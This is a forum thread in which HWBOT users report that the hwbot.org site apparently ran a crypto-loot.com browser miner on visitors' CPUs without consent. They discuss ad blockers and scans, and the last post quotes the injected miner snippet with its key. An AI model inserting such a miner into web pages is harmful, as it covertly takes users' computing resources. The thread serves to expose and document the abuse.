HWBOT Community Forums

HWBOT Forum Website Illegally uses CPU´s of Visitors and Members for Cryptomining?

Shame on u HWBot! This is evan a .org domain. Its not a shady Warez Website its a "Organization" Where overclockers Around the World compete against each other, Official Worldrecords get Posted....

youtu.be/R2X0XoXqfnA

Edited by Drachenlord

Guest Wimpzilla

Hello,

I checked, on my side the forum and website do not bring any UC usage after the page was loaded, under firefox.

I use obviously some AD/trackers blockers.

Also maybe as it had been suggested run an anti-malware just for the sake.

Edited by Wimpzilla

i did a scan with Defender and Malewarebytes. 0 founds... as expected its a absolute Fresh win 10 Install!

HWBot is the Only Website which i have this Incident with.

And see there This website uses the Service of "crypto-loot.com" to Mine Digital Currencys with my CPU without asking me.

hwbotcbk54.jpg

Guest Wimpzilla

Yeah as expected AD block/Ublock do not allow the crypto sfuff to run, if disabled same issue there.

Nice catch, ty for sharing!

lol Seems Like im almost the only user on HWBot without an Adblocker. Did you know that most websites live from advertising? Noone should use an Adblocker in my Opinion!

BTT:

I'm very worried about that the "organization" HWBot.org has enriched itself at the expense of its users in an obviously illigal way

Guest Wimpzilla

In a respectful world of human being you could be right, in the world you actually live in you are completely wrong.

Please, do not jump to a conclusion too fast wait an answer from the admins about.

i did a scan with Defender and Malewarebytes. 0 founds... as expected its a absolute Fresh win 10 Install!

HWBot is the Only Website which i have this Incident with.

And see there This website uses the Service of "crypto-loot.com" to Mine Digital Currencys with my CPU without asking me.

hwbotcbk54.jpg

Interesting.

I run Ublock Origin on everything, that's why I don't see it.

Thanks for the info. It does seem a bit underhanded.

Look what happens once you allow it by disabling adblock and re-enabling it:

Trying to do fetch every 1-2 second

hzsrUDS.png

You should clear browser cache, close browser and open again to see it go.

Code

var miner = new CryptoLoot.Anonymous('5fc6284524573c64cd093a71e70bae0a08af8742562a'); 	miner.start()");

Edited by I.nfraR.ed